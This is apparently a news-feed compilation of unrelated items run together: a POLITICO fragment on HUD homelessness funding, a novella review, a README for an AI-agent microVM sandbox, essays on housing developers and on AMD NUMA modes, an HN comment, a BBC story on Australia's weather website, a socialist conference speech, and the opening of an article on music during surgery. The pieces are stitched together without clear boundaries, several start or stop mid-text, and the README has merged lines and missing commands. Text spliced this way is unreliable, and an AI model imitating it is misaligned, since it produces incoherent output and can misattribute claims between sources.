House and Senate Democrats have urged in letters to HUD to rescind the policy change, submit documentation on how the agency will complete the quick application turnaround for housing project funding and extend funding for grants expiring in 2026.
Senate Banking ranking member
Elizabeth Warren
(D-Mass.) said in a statement that Trump’s “draconian changes to the Continuum of Care program could force 170,000 people out of permanent housing and back onto the street. Congress, state leaders, all of us should be pushing back against the Administration’s cruel move that will dramatically exacerbate the homelessness crisis in cities, towns, and suburbs across the country.”
Rep.
Mike Flood
(R-Neb.), chair of the House Financial Services Subcommittee on Housing and Insurance said that while he doesn’t typically discuss pending litigation, he’s “been working with the administration on policy to build more housing, drive housing costs down, and ensure that existing federal funds are spent in a way that rewards success and drives positive results for the American people.”
Other states included as plaintiffs in the lawsuit are Arizona, California, Colorado, Connecticut, Delaware, Illinois, Kentucky, Maine, Maryland, Massachusetts, Michigan, Minnesota, New Jersey, Oregon, Pennsylvania, Rhode Island, Vermont, Washington and Wisconsin, as well as the District of Columbia.
Katherine Hapgood reports on economic and small business policy in Congress at POLITICO.
Russ Allbery: Review: A Matter of Execution
PlanetDebian
www.eyrie.org
2025-11-27 05:34:00
Review: A Matter of Execution, by Nicholas & Olivia Atwater
Series:
Tales of the Iron Rose #0
Publisher:
Starwatch Press
Copyright:
2024
ISBN:
1-998257-08-8
Format:
Kindle
Pages:
131
A Matter of Execution is ...
A Matter of Execution
is the introductory novella that kicked off
the Tales of the Iron Rose series. It is steampunk fantasy with airships.
I previously read and reviewed the subsequent novel,
Echoes of the Imperium
.
As noted in that review, I read the novel first. That was a mistake; this
is a much better place to start.
A Matter of Execution
was clearly
intended as the introduction of all of these characters. More importantly,
I think reading the novella first would have given me enough affinity with
the characters to not mind the worst part of
Echoes of the
Imperium
: the extremely slow first half that seemed filled with the
protagonist's impostor syndrome.
A Matter of Execution
opens, fittingly, with Captain William Blair,
a goblin, former Imperial soldier, Oathbreaker, and series first-person
protagonist being carted to his execution. He is not alone; in the same
prison wagon is an arrogant (and racist) man named Strahl, the killer of
one of the rulers of Lyonesse.
Strahl is rather contemptuous of Blair's claim to be a captain, given that
he's both a goblin and an Oathbreaker. Strahl quickly revises that opinion
when Blair's crew, somewhat predictably given that he is the series
protagonist, creates a daring escape for both of them. The heat of action
gives both a chance to gain some respect for the other, which explains why
Blair is not only willing to invite Strahl to join his crew, but to go
back for Strahl's companion.
Breaking out Strahl's companion will be a more difficult, and surprising,
problem.
Nicholas Atwater is a role-playing game GM, something that you will learn
the "about the author" section at the end of this novella but probably
will have guessed by then. Even more than
Echoes of the Imperium
,
this novella feels like a (good) write-up of an RPG adventure. A wildly
varied cast of characters come together and form a party with a
well-defined objective that has some surrounding mysteries and surprises.
Each of those characters get their individual moments to show off their
specific skills. Readers with a certain gaming background will know
exactly where to insert the
Borderlands
-style title card with a
slightly demented description of each character.
This is not a complaint. You may be able to see the bones of the setup
adventure for a long-running campaign, but I like this style of character
introduction and the story moves right along. There are a ton of varied
characters, some interesting villains and maybe-villains, a rather
satisfying heist setup, and some good chemistry and a bit of banter. This
is not a deep story — it's clearly an introductory episode for both the
characters and the world background — but it's a fun way to spend a few
hours.
I think the best part of this series is the world-building. If you have
read my review of
Echoes of the Imperium
, you have unfortunately
been mildly spoiled for the revelation in this novella. I don't think it
hurt the story that much; you will be able to predict what obvious gaps in
the novel backstory the novella is going to fill in, but it's just as
enjoyable to see how that happens. But the Atwaters aren't going to drop
any of the big world-building bombs in the introductory novella, of
course. Instead, you get a gradual introduction to the nature of magic in
this world, some of the political setup of the recent war, and a quick
introduction to the capabilities of Strahl's mysterious companion.
If you've not yet read this series, I recommend starting here. It's a
quick investment to see if you'll be interested. The novel is heavier and
slower, and the pacing of the first half isn't great, but the
world-building is even better.
If you've already read the novel, this is still worth reading as long as
you enjoyed it. You'll have a few moments of "oh,
that's
how that
happened," and it's a fun and fast-moving way to spend a bit more time
with the characters.
Followed by
Echoes of the Imperium
. The
back matter of the novella says that
The Winds of Fortune
is
supposedly forthcoming.
Rating: 7 out of 10
Reviewed: 2025-11-26
Show HN: Era – Open-source local sandbox for AI agents
Run untrusted or AI-generated code locally inside microVMs that behave like containers for great devX, 200ms launch time, and better security.
There's a fully managed cloud layer, globally deployed Worker/API, jump to
cloudflare/README.md
.
Quick Start
installation options
option 1: homebrew (recommended)
# 1. install the tap
brew tap binsquare/era-agent-cli
# 2. install era agent
brew install binsquare/era-agent-cli/era-agent
# 3. install dependencies
brew install krunvm buildah
# 4. verify the CLI is on PATH
agent vm exec --help
# 4. follow platform-specific setup (see below)
option 2: from source
# 1. install dependencies
brew install krunvm buildah # on macos# 2. clone the repository
git clone https://github.com/binsquare/era
cd era-agent
# 3. build the agent
make
# 4. follow platform-specific setup (see below)
Installation (macOS)
brew tap binsquare/era-agent-cli
brew install era-agent-cli
brew install krunvm buildah
Run the post-install helper to prepare the case-sensitive volume/state dir on macOS:
$(brew --prefix era-agent)/libexec/setup/setup.sh
platform setup details
homebrew installation setup
if you installed era agent via homebrew, use the setup script from the installed location:
# for macos users with homebrew installation$(brew --prefix era-agent)/libexec/setup/setup.sh
# or run the setup script directly after installation$(brew --prefix)/bin/era-agent-setup # if setup script is linked separately
macos setup
Run
scripts/macos/setup.sh
to bootstrap dependencies, validate (or create) a case-sensitive volume, and prepare an agent state directory (the script may prompt for your password to run
diskutil
). The script will also detect your Homebrew installation and recommend the correct value for the
DYLD_LIBRARY_PATH
environment variable, which may be required for
krunvm
to find its dynamic libraries.
If you prefer to create the dedicated volume manually, open a separate terminal and run (with
sudo
as required):
(replace
disk3
with the identifier reported by
diskutil list
). The operation is non-destructive, does not require
sudo
, and shares space with the source container volume.
When prompted by the setup script, accept the default mount point (
/Volumes/krunvm
) or provide your own. Afterwards, export the environment variables printed by the script (at minimum
AGENT_STATE_DIR
,
KRUNVM_DATA_DIR
, and
CONTAINERS_STORAGE_CONF
) before invoking
agent
or running
krunvm
/
buildah
directly. The helper now prepares a matching container-storage configuration under the case-sensitive volume so the CLI can run without extra manual steps.
The script also writes
policy.json
/
registries.conf
under the same directory so Buildah doesn't look for root-owned files in
/etc/containers
. Export the variables it prints (
CONTAINERS_POLICY
,
CONTAINERS_REGISTRIES_CONF
) if you invoke Buildah manually.
Linux Setup
Install
krunvm
and
buildah
using your package manager (the specific installation method may vary)
Ensure the system is properly configured to run microVMs (may require kernel modules or specific privileges)
Consider setting
AGENT_STATE_DIR
to a writable location if running as non-root
Runtime Requirements
krunvm
must be installed and available on
$PATH
(Homebrew:
brew install krunvm
; see upstream docs for other platforms).
buildah
must also be present because
krunvm
shells out to it for OCI image handling.
On macOS,
krunvm
requires a case-sensitive APFS volume; see the macOS setup notes above.
Build
make # builds the agent CLI
make clean # removes build artifacts (Go cache)
Full platform-specific steps (macOS volume setup, Linux env vars, troubleshooting) live in
era-agent/README.md
.
🎥 Demo Video
A demo video showing how to install and use the CLI tool is available in the
era-agent directory
. This video covers:
Installing dependencies and compiling the CLI tool
Creating and accessing local VMs
Running code and agents through commands or scripts
Uploading and downloading files to/from a VM
Core Commands
# create a long-running VM
agent vm create --language python --cpu 1 --mem 256 --network allow_all
# run something inside it
agent vm exec --vm <id> --cmd "python -c 'print(\"hi\")'"# ephemeral one-off execution
agent vm temp --language javascript --cmd "node -e 'console.log(42)'"# inspect / cleanup
agent vm list
agent vm stop --all
agent vm clean --all
Supported
--language
values:
python
,
javascript
/
node
/
typescript
,
go
,
ruby
. Override the base image with
--image
if you need a custom runtime.
⚙ Configuration Highlights
AGENT_STATE_DIR
: writable directory for VM metadata, krunvm state, and Buildah storage. The macOS setup script prints the correct exports.
AGENT_LOG_LEVEL
(
debug|info|warn|error
) and
AGENT_LOG_FILE
: control logging.
In New York, one of the toughest challenges that Mayor-elect Zohran Mamdani faces will be preserving and increasing the supply of affordable housing. Same story in Boston, where I live and where our progressive mayor, Michelle Wu, is constrained by similar forces.
The immediate obstacles are a scarcity of buildable land and subsidy dollars. In both cities, higher taxes to support more housing requires the approval of state government.
New York has a form of rent control, known as rent stabilization, but most New Yorkers do not live in rent-stabilized apartments. Boston once had rent control, but the state legislature took it away in 1994. Local option rent control will be back before voters next year via a ballot initiative.
But behind all of these challenges is the sheer political power of developers. Let me give a couple of emblematic examples
Thirty years ago, Boston had massive tracts of vacant developable land in a part of the waterfront that was a jumble of parking lots, warehouses, and piers. It had not been developed partly because its ownership was patchwork, and partly because Boston was still emerging from a prolonged recession.
The land area totaled about 1,000 acres, only slightly less than Boston’s entire historic downtown. It represented the city’s last large-scale building opportunity.
The Boston Redevelopment Authority (BRA) gradually got control of the land, rebranded it as the Seaport District, then as the Innovation District, and in 1999 began working with private developers to create a whole new section of the city with hotels, office buildings, restaurants, and luxury housing. Number of affordable housing units: fewer than 500.
Why? Because the BRA and the two mayors of that era, Tom Menino (1993–2014) and Marty Walsh (2014–2021), were close allies of developers, and luxury pays. The total public subsidy for the Seaport/Innovation District is hard to calculate, because it is a mix of land assembly, roads, infrastructure, and tax breaks, but it easily runs into the billions. Think of the affordable housing that might have been built.
In addition to being a case study of how not to develop affordable housing, the Innovation District is a case study of how not to do transportation and climate remediation. It is exactly at sea level, and the city imposed hardly any building standards to protect against sea level rise. Thus its nickname: The Inundation District. And no subway line was extended to the new district, creating parking problems.
This all occurred not because planners are stupid. It occurred because of the political power of developers.
Now, Boston finally has a mayor who is not in the pocket of developers, Michelle Wu. But that one last giant tract is pretty well filled up.
Developers were so anxious about not having an ally in City Hall that they poured money into the campaign of billionaire Josh Kraft, a carpetbagger from the suburbs whom Wu so thoroughly trounced in the September preliminary election that he dropped out before the November final.
But winning an election overwhelmingly is not the same as having adequate resources. And even if developers no longer control City Hall, they pretty well control the legislature. So Boston is unlikely to get the taxing resources that it needs to build more affordable housing.
IN NEW YORK, THERE IS NOTHING QUITE COMPARABLE
to the Seaport District, but a wasted opportunity on a smaller scale is the development called Hudson Yards on the far West Side of Manhattan. Built on giant platforms over rail lines, the heart of Hudson Yards is a giant indoor mall plus luxury housing.
Think about New York City for a minute. One of its many great qualities is the street-level retail of all kinds. New York needs a suburban-style indoor shopping mall like the proverbial bull needs proverbial teats. Plus, the region already has them: It’s called New Jersey.
But there was money to be made, so in 2005 the city cut a deal (finalized by the city council in 2013) with billionaire Steve Ross and his Related Companies to develop Hudson Yards with a total of 13,500 housing units, of which some 4,000 were to be affordable. In the end, only about 600 affordable units were produced. The average Hudson Yards condo in 2025 has sold for $7.4 million.
At the time, the mayor was (of course) Michael Bloomberg, a civic liberal in some respects but the ultimate ally of real estate developers.
Here is another telling irony. One of the nearby public amenities that makes Hudson Yards and the surrounding areas so commercially valuable is a wonderful quirky walkway called the High Line. It began life as an abandoned elevated railroad track. When I lived in West Greenwich Village as a young writer, it went right through my neighborhood.
In the 1990s, a local group, Friends of the High Line, came up with the improbable idea of developing it into a greened pathway. They persuaded very skeptical city officials to let them try, and the idea has succeeded spectacularly. The High Line is now a charming elevated park. It is so attractive that luxury housing has been built all along it, and it is one of the attractions of the nearby Hudson Yards.
So something that began as a loving, volunteer civic endeavor has become one more subsidy to billionaires. The ghost of the economist Henry George would understand. He proposed a tax on the unearned increment in land values.
There is a second phase of Hudson Yards still in the planning stage. The original developer bailed out, and various city agencies are still in final negotiations with the latest developer. The city has spent billions in various subsidies for Hudson Yards. Here is where Mayor-elect Mamdani comes in. He could demand a lot more affordable housing.
THERE IS ONE MORE WAY THAT DEVELOPERS
have choked off the supply of affordable housing in places like Boston and New York. That is by converting subsidized apartments intended for low- or middle-income people into luxury housing. Many federal programs allow this to be done as soon as the original mortgage is paid off.
In New York, many moderate-income complexes built with tax subsidies, such as Stuyvesant Town and Peter Cooper Village, have been converted to luxury housing. Likewise for many New York apartments built as middle-class housing under a city-state program that used tax-exempt bonds and loans with low interest rates, called the Mitchell-Lama program.
One of the prime offenders, who got very rich converting Mitchell-Lama apartments, was a developer named … wait for it … Steve Witkoff. Yes, the same Trump crony who sold out middle-income New York renters is now reborn as Trump’s foreign-policy guy in charge of selling out Ukraine.
These conversions could not have been done without the approval of city officials. This is another reflection of the same political power of developers. The big developers were huge campaign contributors to the opponents of Mamdani because they appreciated that he could put a stop to this thievery. Let’s hope that he does.
Robert Kuttner is co-founder and co-editor of The American Prospect, and professor at Brandeis University’s Heller School. His latest book is Going Big: FDR’s Legacy, Biden’s New Deal, and the Struggle.
Evaluating Uniform Memory Access Mode on AMD's Turin
NUMA, or Non-Uniform Memory Access, lets hardware expose affinity between cores and memory controllers to software. NUMA nodes traditionally aligned with socket boundaries, but modern server chips can subdivide a socket into multiple NUMA nodes. It’s a reflection of how non-uniform interconnects get as core and memory controller counts keep going up. AMD designates their NUMA modes with the NPS (Nodes Per Socket) prefix.
NPS0 is a special NUMA mode that goes in the other direction. Rather than subdivide the system, NPS0 exposes a dual socket system as a single monolithic entity. It evenly distributes memory accesses across all memory controller channels, providing uniform memory access like in a desktop system. NPS0 and similar modes exist because optimizing for NUMA can be complicated and time intensive. Programmers have to specify a NUMA node for each memory allocation, and take are to minimize cross-node memory accesses. Each NUMA node only represents a fraction of system resources, so code pinned to a NUMA node will be constrained by that node’s CPU core count, memory bandwidth, and memory capacity. Effort spent getting an application to scale across NUMA nodes might be effort not spent on a software project’s other goals.
From AMD’s EPYC 9005 Series Architecture Overview, showing a dual socket Zen 5 (Turin) setup in NPS1 mode
A massive thank you goes to
Verda (formerly DataCrunch)
for proving an instance with 2 AMD EPYC 9575Fs and 8 Nvidia B200 GPUs.
Verda
gave us about 3 weeks with the instance to do with as we wished. While this article looks at the AMD EPYC 9575Fs, there will be upcoming coverage of the B200s found in the VM.
This system appears to be running in NPS0 mode, giving an opportunity to see how a modern server acts with 24 memory controllers providing uniform memory access.
A simple latency test immediately shows the cost of providing uniform memory access. DRAM latency rises to over 220 ns, giving a nearly 90 ns penalty over the EPYC 9355P running in NPS1 mode. It’s a high penalty compared to using the equivalent of NPS0 on older systems. For example, a dual socket Broadwell system has 75.8 ns of DRAM latency when each socket is treated as a NUMA node, and 104.6 ns with uniform memory access[1].
NPS0 mode does have a bandwidth advantage from bringing twice as many memory controllers into play. But the extra bandwidth doesn’t translate to a latency advantage until bandwidth demands reach nearly 400 GB/s. The EPYC 9355P seems to suffer when a latency test thread is mixed with bandwidth heavy ones. A bandwidth test thread with just linear read patterns
can achieve 479 GB/s in NPS1 mode
. However, my bandwidth test produces low values on the EPYC 9575F because not all test threads finish at the same time. I avoid this problem in the loaded memory latency test, because I have bandwidth load threads check a flag. That lets me stop all threads at approximately the same time.
Per-CCD bandwidth is barely affected by the different NPS modes. Both the EPYC 9355P and 9575F use “GMI-Wide” links for their Core Complex Dies, or CCDs. GMI-Wide provides 64B/cycle of read and write bandwidth at the Infinity Fabric clock. On both chips, each CCD enjoys more bandwidth to the system compared to standard “GMI-Narrow” configurations. For reference, a GMI-Narrow setup running at a typical desktop 2 GHz FCLK would be limited to 64 GB/s of read and 32 GB/s of write bandwidth.
Higher memory latency could lead to lower performance, especially in single threaded workloads. But the EPYC 9575F does surprisingly well in SPEC CPU2017. The EPYC 9575F runs at a higher 5 GHz clock speed, and DRAM latency is only one of many factors that affect CPU performance.
Individual workloads show a more complex picture. The EPYC 9575F does best when workloads don’t miss cache. Then, its high 5 GHz clock speed can shine. 548.exchange2 is an example. On the other hand, workloads that hit DRAM a lot suffer in NPS0 mode. 502.gcc, 505.mcf, and 520.omnetpp see the EPYC 9575F’s higher clock speed count for nothing, and the higher clocked chip underperforms compared to 4.4 GHz setups with lower DRAM latency.
SPEC CPU2017’s floating point suite also shows diverse behavior. 549.fotonik3d and 554.roms suffer in NPS0 mode as the EPYC 9575F struggles to keep itself fed. 538.imagick plays nicely to the EPYC 9575F’s advantages. In that test, high cache hitrates let the 9575F’s higher core throughput shine through.
NPS0 mode performs surprisingly well in a single threaded SPEC CPU2017 run. Some sub-tests suffer from higher memory latency, but enough other tests benefit from the higher 5 GHz clock speed to make up the difference. It’s a lesson about the importance of clock speeds and good caching in a modern server CPU. Those two factors go together, because faster cores only provide a performance advantage if the memory subsystem can feed them. The EPYC 9575F’s good overall performance despite having over 220 ns of memory latency shows how good its caching setup is.
As for running in NPS0 mode, I don’t think it’s worthwhile in a modern system. The latency penalty is very high, and bandwidth gains are minor for NUMA-unaware code. I expect those latency penalties to get worse as server core and memory controller counts continue to increase. For workloads that need to scale across socket boundaries, optimizing for NUMA looks to be an unfortunate necessity.
Again, a massive thank you goes to
Verda (formerly DataCrunch)
without which this article, and the upcoming B200 article, would not be possible!
Seems weird to say, but I've been posting here for seventeen years now. And in that time, can I say that the quality of the discourse has slipped some? Well... if I'm being honest, probably yeah. A little. But at the same time, I can still honestly say that HN is still easily the best community of this sort on the 'net, at least that I'm aware of. OK, Lobste.rs has some merit, but the problem there is that the community there is arguably still a little too small, and you just don't get the variety and volume of interesting discussion you get here. But the level of discourse is high there as well.
Anyway, I find HN to be a wonderful refuge from a lot of the absurdity that's "out there" and I will happily throw in my own "Thanks, guys!" to dang and tomhow. And to pg for starting this whole thing back in the day.
Happy Thanksgiving, everyone, and here's to more years to come!
$96M AUD revamp of Bom website bombs out on launch
Australia's beloved weather website got a makeover - and infuriated users
Getty Images
Farmers are angry - they argue the information they need is now hard to find
It was an unseasonably warm spring day in Sydney on 22 October, with a forecast of 39C (99F) - a real scorcher.
The day before, the state of New South Wales had reported its hottest day in over a century, a high of 44.8C in the outback town of Bourke.
But little did the team at the national Bureau of Meteorology foresee that they, in particular, would soon be feeling the heat.
Affectionately known by Australians as the Bom, the agency's long-awaited website redesign went live that morning, more than a decade after the last update.
Within hours, the Bom was flooded with a deluge of complaints. The hashtag #changeitback went viral.
Gripes ranged from the new colour scheme for the rain radar, to furious farmers and fishermen who could no longer put in GPS coordinates to find forecasts for a specific location.
And then, this week it was revealed that the site's redesign had cost about A$96.5m ($62.3m; £48m), 20 times more than the previously stated A$4.1m.
"First you violate expectations by making something worse, then you compound the injury by revealing the violation was both expensive and avoidable," psychologist and neuroscientist Joel Pearson told the BBC, explaining the public outrage.
"It's the government IT project equivalent of ordering a renovation, discovering the contractor has made your house less functional, and then learning they charged you for a mansion."
'Game of hide and seek'
A consensus was quickly clear: "Please bring back the previous format," one person surmised on social media.
"It's awful, the most useful features are gone and it's not user-friendly. A waste of taxpayer money," another added.
Others said the timing was poor: "Why change it on a day of severe weather?"
There were some fans, including one who posted: "I like the new site. The front page is much cleaner". But they were few and far between.
Less than 48 hours after the launch, the Bom released a
list of tips
on how to use the new site, but this was further mocked by disgruntled users.
"Terrible! You shouldn't need step-by-step instructions to navigate the site," one post read.
Social media has been flooded with complaints about the new site
With more than 2.6 billion views a year, Bom tried to explain that the site's refresh - prompted by a major cybersecurity breach in 2015 - was aimed at improving stability, security and accessibility. It did little to satisfy the public.
Some frustrated users turned to humour: "As much as I love a good game of hide and seek, can you tell us where you're hiding synoptic charts or drop some clues?"
Malcolm Taylor, an agronomist in Victoria, told the Australian Broadcasting Corporation (ABC) that the redesign was a complete disaster.
"I'm the person who needs it and it's not giving me the information I need," the plant and soil scientist said.
Others appeared to accept their fate: "I am sure we will get used to it but it is not intuitive at all."
Bureau of Meteorology
Many users say they found the old version easier to navigate
Exactly a week after the debacle, the acting head of the agency was forced to apologise. There were concerns that people had been underprepared for storms in Queensland because of the site's poor usability.
The outpouring prompted the federal government to issue a scathing rebuke of the Bom and order immediate changes to the site.
"The bureau clearly has work to do, in that it has lost community confidence in the new website," Energy Minister Chris Bowen said at the time.
In a bid to calm the storm, parts of the previous site were brought back to life, giving people the option to use the old features.
A month after the relaunch, the new head of the Bom - who started his role during the saga - admitted the changes had been "challenging for some" and again apologised for the confusion.
"Inherently, we don't, and won't, always get it perfectly right. But, we are constantly striving to get better," Dr Stuart Minchin said.
But he kicked off another round of criticism by revealing the revamp actually cost $96m, a figure which covered a full website rebuild and testing of the "systems and technology that underpin" it.
Immediately, the government demanded Bom explain how taxpayers' money had been spent "efficiently and appropriately," according to the Sydney Morning Herald.
Barnaby Joyce, a member of the Nationals, which mainly represents regional communities, said: "We spent $96m to put a B at the end of the Bom site. It's now bomb, it's hopeless."
New site 'scrambling' people's brains
On the day of the launch, the Bom assured Australians that the community had been consulted on the changes. A test site in the months leading up to the relaunch found customer satisfaction rates were consistently above 70%, they told the BBC.
"The tsunami of complaints suggests that consultation was either perfunctory or they listened to the wrong people," Mr Pearson said.
For years, farmers and emergency workers had developed what neuroscientists call "procedural memory" for reading weather patterns using the site, he explained. It's muscle memory like touch-typing or driving a familiar route home.
"Your fingers know where the keys are, your hands know when to turn."
But when the new site changed the radar's colour scale, long-time users were left scratching their heads as their "hard-won intuition for reading storm intensity became unreliable overnight".
Steve Turton/Bom
The old colour scheme included black which users said was a useful indicator
The new site, Mr Pearson said, "was scrambling the neurological shortcuts that people had spent a decade building".
"It's like rearranging all the furniture in your house and then expecting you to navigate it in the dark without stubbing your toe. Except the 'furniture' in this case determines whether you move your livestock before the flood arrives."
For sociologist Ash Watson, the collective reaction to the site reflected its special status in Australia.
"Australia has always been a large country of weather extremes, and Bom's cultural importance has really been cemented in recent years as we've experienced more severe weather and the rising impacts of climate change."
As a regular user of Bom's site, Ms Watson acknowledged the good intentions behind the changes, but said her research - on the social impact of tech - showed that people are getting fatigued by change.
"It can be hard for people to get excited by new updates and see their immediate benefits when they don't want to have to learn how to use yet another new platform, app or website."
AFP via Getty Images
The Bom website performs an essential role in times of disaster
This is not the first time the Bom has weathered a publicity storm.
In 2022, it spent hundreds of thousands of dollars on a rebrand, asking to be called either its full name or "the bureau", not the "weather bureau" or "the Bom", given the negative connotations.
But the campaign was short-lived. They eventually released a statement saying the public was welcome to use whatever name they wished.
The incident reflected a fundamental misunderstanding of how the culture of naming works, Mr Pearson said.
Australians had organically adopted "Bom" as a term of affection, like a nickname for a friend, he said.
"When the institution tried to correct this, it felt like being told you're pronouncing your mate's name wrong."
He said the site's redesign revealed a similar "cultural blindness but with higher stakes".
In a statement, Bom's spokesperson told the BBC it had received about 400,000 items of feedback on the new site, which accounted for less than 1% of the 55 million visits in the past month.
The responses were "both positive and negative", they said, with fans saying they liked the new design and presentation, the accuracy and reliability of the forecasts, and greater ease in using the site on different types of mobile devices.
But it was clear that people had "formed strong habits", the spokesperson said, and further changes may be made based on the feedback.
The Goal of Socialism Is Everything
Portside
portside.org
2025-11-27 05:01:47
The Goal of Socialism Is Everything
Mark Brody
Thu, 11/27/2025 - 00:01
...
On Saturday, November 22,
Jacobin
founding editor Bhaskar Sunkara delivered the keynote at New York City Democratic Socialists of America’s (DSA) biannual organizing conference at the First Unitarian Congregational Society in Brooklyn. Below is a transcript of his remarks on why the Left must win real gains today — but also keep fighting for a socialist society beyond them.
I'm so excited to be here with you all. It feels to me that this is the political moment so many of us have been waiting for and working to build for years.
We’re a month away from one of our comrades becoming mayor. We’ve built a network of socialist elected officials, we have a real organization to call home, and there’s a growing base of support in this city for our immediate demand of taxing the rich to expand public goods.
This moment extends beyond New York — we have a huge political opening in the United States as whole. But we know that we have that opportunity because millions of people are living through hard times. We have an erratic and authoritarian president, we have an affordability crisis, with millions struggling to pay their bills and to live lives where they’re treated with dignity and respect. We’ve seen the return of forms of nativism and racism that should have been long vanquished by now.
And at a social and economic level, things may get worse very soon.
The country — not just this city — is crying out for principled political leadership. Not just a kind of populist leadership through great figures, though I’m grateful we have one of the greatest figures on our side. I mean class leadership through organization.
The leadership that says that the disparities that we see in our country and the world are not the natural laws of God but the result of a world that human beings have created. The leadership that says that the interests of the working-class majority are distinct from the interest of capitalist elites, and that we need to organize around those interests to win not only a better distribution of wealth
within capitalism
but a different type of society all together.
God’s Children Can Govern
Ijoined the Democratic Socialists of America when I was seventeen years old. I don’t need to tell you what DSA was in New York back in 2007. Some of you here remember it. I made so many good friends, but we were lucky if a dozen people showed up to a meeting.
We made progress through the patient, steady work and commitment of those people and the many more who joined later. We were marathon runners for socialism.
This, though, is a moment for sprinting. This is the biggest opening our movement has had in decades. The time we devote to political work in the next few months and years will have an outsize impact in our city and country — for now and for posterity.
But what exactly should we be doing, and how should we relate to both the new mayor’s administration and our other comrades in elected office? In my mind, our tasks as organized socialists outside of government are both different and largely compatible with theirs.
The key demands of our moment are around the affordability agenda. Our mayor-elect will be leading an effort to raise revenue to fund social programs and empower the city’s working class. If Zohran , our other electeds, and the grassroots movement around them deliver positive change in people’s lives, we’ll build a deeper social base for the Left.
Right now, our electoral strength has far outpaced our base. But people are ready for our message and ready for results.
But fundamentally, there are constraints to any sort of social democratic governance. Just as under capitalism, workers are dependent on having profitable firms for jobs. Cities are dependent on big corporations and wealthy people for tax revenue.
Zohran needs to navigate these constraints. He can’t undermine the old regime of accumulation and redistribution without having a replacement for it, and certainly there can’t be a total replacement in one city.
These concerns aren’t new. This is the dilemma of social democracy. This is the tension between our near-term and long-term goals that has existed in the socialist movement for 150 years.
Our elected officials in the near term need to manage capitalism in the interest of workers, while our movement also has a long-term goal of constructing a new system through the self-emancipation of those workers.
We need to see the constraints that Zohran will be under in these structural terms, rather than moral ones. But having patience and being supportive of him doesn’t answer how we reconcile the
near
and the
long
— social democracy and socialism.
At the very least, it’s important that we remember the end goal. The great theorist of reformism, Eduard Bernstein, once said that “the goal is nothing, the movement everything.” I think that’s not quite right. If we don’t talk about socialism after capitalism, no one else will. The historic dream of our movement, a world without exploitation or oppression, will be lost.
But we shouldn’t just avoid reformism because we want to feel pure as “true socialists” or as an intellectual pursuit. We should avoid reformism and remember the goal of rupture with capitalism because it can offer a compelling vision of the world to those we’re trying to reach.
Socialism isn’t “Sweden” like Bernie sometimes says. Socialism isn’t even
just
, as Martin Luther King Jr said and Zohran has beautifully invoked, “a better distribution of wealth for all of God’s children.”
Socialism means a better distribution but also democratic control over the things we all depend on — workers holding the levers of production and investment, and the state guaranteeing the basics of life as social rights.
Socialism means no longer begging corporations to invest in our communities or the rich to stay and pay their taxes.
Socialism means overcoming the labor-capital dialectic through the triumph of labor itself, not a more favorable class compromise.
Socialism means that the people who’ve kept this world alive — the caregivers, the drivers, the machinists, the farmworkers, the cleaners — stop being an invisible backdrop and become the authors of their futures.
Socialism means a society where those who have always given without having any say finally show their true capabilities. Where, as C. L. R. James
said
, every cook can govern.
Socialism means replacing an economy built on hierarchy and exclusion with one built on the intelligence and creativity of working people themselves.
That is the goal we keep alive. Not because it’s utopian, but because it is the only horizon equal to the dignity and potential of ordinary people.
And because, it’s
compelling
. This isn’t just offering workers some of their surplus value back in exchange for their votes. It’s offering them
the future
, a society that they can own, a chance to assume their rightful place as agents of history.
Something like this is real socialism. It isn’t an interest group or a label to distinguish ourselves from other progressives. It’s a fundamentally more radical goal than those of our allies. It’s premised on a different analysis of the world around us and the world that can be built.
Perhaps we can think of ways to bridge some of the gap between near and long through a set of demands that at least raise the concept of socialization immediately. Ideas that offer not just more badly needed social welfare but a taste of ownership and control. A hint at a different political economy.
Just one example: when a business closes down or its owners are retiring, workers supported by a public fund could get the first crack at saving it by converting it into a labor-managed firm. At the city level, we can have a municipal office to help workers turn shuttered shops into cooperatives by providing the backbone of legal and accounting support and fast-tracking permits.
We’ve already been talking about city-owned grocery stores and the need for public housing. We need more ideas like these. Reforms that fit within social democracy but gesture beyond it.
Socialism in Our Time
It’s been thrilling to meet people who’ve just joined DSA. It’s been nice to see old friends too. I’ve been complaining about missing the first half of the Knicks game, but even Jalen Brunson can’t keep me away from here.
I’m really enthusiastic about what we can do in the next couple of years. We
will
improve the lives of millions of people. And we will grow our movement.
But in addition to enthusiasm, we need
honesty about how far we still have to go to root ourselves in working-class communities. We need more power not just at the ballot box but at the points of production and exchange. And we need to be honest about the battles and constraints that Zohran will face, and be ready to support him when times get tough.
Zohran’s mayoralty will be a fight for what’s winnable right now. Our job is to let that fight expand, not narrow, our horizon — and to keep alive the goal of socialism in our time.
Bhaskar Sunkara is the founding editor of
Jacobin
, the president of the
Nation
magazine, and the author of
The Socialist Manifesto: The Case for Radical Politics in an Era of Extreme Inequality
.
Music eases surgery and speeds recovery, study finds
Music eases surgery and speeds recovery, Indian study finds
Soutik Biswas
India correspondent
BBC
A patient with headphones playing music during surgery in a hospital in Delhi
Under the harsh lights of an operating theatre in the Indian capital, Delhi, a woman lies motionless as surgeons prepare to remove her gallbladder.
She is under general anaesthesia: unconscious, insensate and rendered completely still by a blend of drugs that induce deep sleep, block memory, blunt pain and temporarily paralyse her muscles.
Yet, amid the hum of monitors and the steady rhythm of the surgical team, a gentle stream of flute music plays through the headphones placed over her ears.
Even as the drugs silence much of her brain, its auditory pathway remains partly active. When she wakes up, she will regain consciousness more quickly and clearly because she required lower doses of anaesthetic drugs such as propofol and opioid painkillers than patients who heard no music.
That, at least, is what a
new peer-reviewed study
from Delhi's Maulana Azad Medical College and Lok Nayak Hospital suggests. The research, published in the journal Music and Medicine, offers some of the strongest evidence yet that music played during general anaesthesia can modestly but meaningfully reduce drug requirements and improve recovery.
The study focuses on patients undergoing laparoscopic cholecystectomy, the standard keyhole operation to remove the gallbladder. The procedure is short - usually under an hour - and demands a particularly swift, "clear-headed" recovery.
To understand why the researchers turned to music, it helps to decode the modern practice of anaesthesia.
"Our aim is early discharge after surgery," says Dr Farah Husain, senior specialist in anaesthesia and certified music therapist for the study. "Patients need to wake up clear-headed, alert and oriented, and ideally pain-free. With better pain management, the stress response is curtailed."
Achieving that requires a carefully balanced mix of five or six drugs that together keep the patient asleep, block pain, prevent memory of the surgery and relax the muscles.
Getty Images
Patients need to wake up clear-headed and ideally pain-free after surgery
In procedures like laparoscopic gallbladder removal, anaesthesiologists now often supplement this drug regimen with regional "blocks" - ultrasound-guided injections that numb nerves in the abdominal wall.
"General anaesthesia plus blocks is the norm," says Dr Tanvi Goel, primary investigator and a former senior resident of Maulana Azad Medical College. "We've been doing this for decades."
